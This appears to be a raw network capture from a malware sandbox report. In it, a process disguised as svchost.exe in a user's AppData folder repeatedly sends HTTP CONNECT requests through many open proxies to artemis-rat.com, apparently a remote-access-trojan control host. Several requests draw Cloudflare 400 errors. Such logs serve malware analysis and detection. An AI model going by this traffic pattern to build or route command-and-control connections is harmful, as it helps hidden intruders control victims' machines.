Mar 9, 2024 13:14:38.737318039 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3746	192.168.2.5	61829	36.134.91.82	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.584981918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3747	192.168.2.5	61958	43.131.248.165	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.586178064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3748	192.168.2.5	62049	34.49.208.221	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.590820074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3749	192.168.2.5	61953	134.209.105.209	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.600893974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3750	192.168.2.5	62065	45.12.31.3	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.602118015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.756556988 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3751	192.168.2.5	61995	181.143.11.157	10219	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.610377073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3752	192.168.2.5	62069	185.162.230.201	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.610485077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.764806032 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3753	192.168.2.5	61507	140.238.25.255	21000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.634171963 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3754	192.168.2.5	61952	65.1.40.47	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.635118008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3755	192.168.2.5	62077	104.22.1.113	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.638767958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.793066025 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3756	192.168.2.5	62000	27.96.235.171	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.640311956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3757	192.168.2.5	60678	51.89.173.40	27887	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.644160986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3758	192.168.2.5	61998	5.135.83.214	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.647427082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3759	192.168.2.5	62025	52.196.1.182	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.651396990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3760	192.168.2.5	61988	43.155.130.182	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.652199030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
3761	192.168.2.5	62011	110.12.211.140	80

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.688604116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3762	192.168.2.5	61875	120.194.4.157	5443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.691920042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3763	192.168.2.5	62086	104.18.220.95	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.700787067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.855202913 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3764	192.168.2.5	61742	104.37.135.145	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.711616993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3765	192.168.2.5	61987	222.223.103.232	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.712985039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3766	192.168.2.5	60836	51.222.241.8	62916	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.728008986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3767	192.168.2.5	61544	199.58.184.97	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.743714094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3768	192.168.2.5	62040	190.128.228.182	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.763926029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3769	192.168.2.5	61541	150.230.96.150	19291	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.779207945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3770	192.168.2.5	62102	43.153.22.29	10005	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.779308081 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3771	192.168.2.5	61993	90.188.250.16	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.785788059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3772	192.168.2.5	62068	103.23.100.1	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.786684036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3773	192.168.2.5	62070	45.120.178.197	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.787462950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3774	192.168.2.5	60768	222.174.178.122	4999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.788120031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3775	192.168.2.5	62080	95.164.89.123	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.806495905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3776	192.168.2.5	58888	165.232.89.116	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.807342052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3777	192.168.2.5	62076	45.138.87.238	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.811558962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3778	192.168.2.5	62036	185.158.114.14	25697	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.816528082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3779	192.168.2.5	58869	190.220.228.147	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.824995995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3780	192.168.2.5	62072	103.42.57.13	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.840234041 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3781	192.168.2.5	58886	43.255.113.232	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.858952999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3782	192.168.2.5	62091	46.17.63.166	9091	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.859776020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3783	192.168.2.5	62094	134.209.189.42	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.862647057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3784	192.168.2.5	61562	198.49.68.80	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3785	192.168.2.5	59005	177.234.194.226	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3786	192.168.2.5	62099	120.76.42.209	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3787	192.168.2.5	62111	193.239.58.92	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3788	192.168.2.5	62118	45.61.188.134	44499	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3789	192.168.2.5	58972	213.252.245.221	6116	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3790	192.168.2.5	59117	136.244.99.51	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3791	192.168.2.5	62097	124.163.236.54	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3792	192.168.2.5	62130	142.4.123.41	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3793	192.168.2.5	62117	219.71.216.78	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3794	192.168.2.5	62128	34.49.208.221	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3795	192.168.2.5	61701	198.12.255.193	6821	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3796	192.168.2.5	62116	34.95.243.122	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3797	192.168.2.5	59160	162.144.121.232	24787	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3798	192.168.2.5	61637	207.180.234.220	42692	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3799	192.168.2.5	62168	104.25.115.125	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3800	192.168.2.5	62132	163.172.169.27	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3801	192.168.2.5	62119	103.146.137.5	1081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3802	192.168.2.5	59258	45.10.42.20	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
